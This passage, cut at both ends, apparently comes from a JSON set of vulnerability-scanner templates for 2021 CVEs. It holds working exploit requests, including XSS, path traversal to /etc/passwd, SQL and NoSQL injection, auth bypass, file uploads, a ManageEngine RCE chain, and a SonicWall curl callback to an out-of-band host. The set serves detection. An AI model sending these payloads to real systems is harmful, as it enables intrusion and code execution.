Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-46418","info":{"name":"Telesquare TLR-2855KS6 - Arbitrary File Creation","severity":"high"},"requests":[{"raw":["PUT /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{randstr}}\n","GET /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 201","contains(server_1, \"lighttpd\") && contains(content_type_2, \"text/plain\")","contains(body_2, \"{{randstr}}\")"],"condition":"and"}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/jnews/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Change Log:","JNews -"],"condition":"and"}]},{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/elementor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["Elementor Website Builder","Elementor Page Builder"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4')"]},{"type":"regex","part":"body","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost 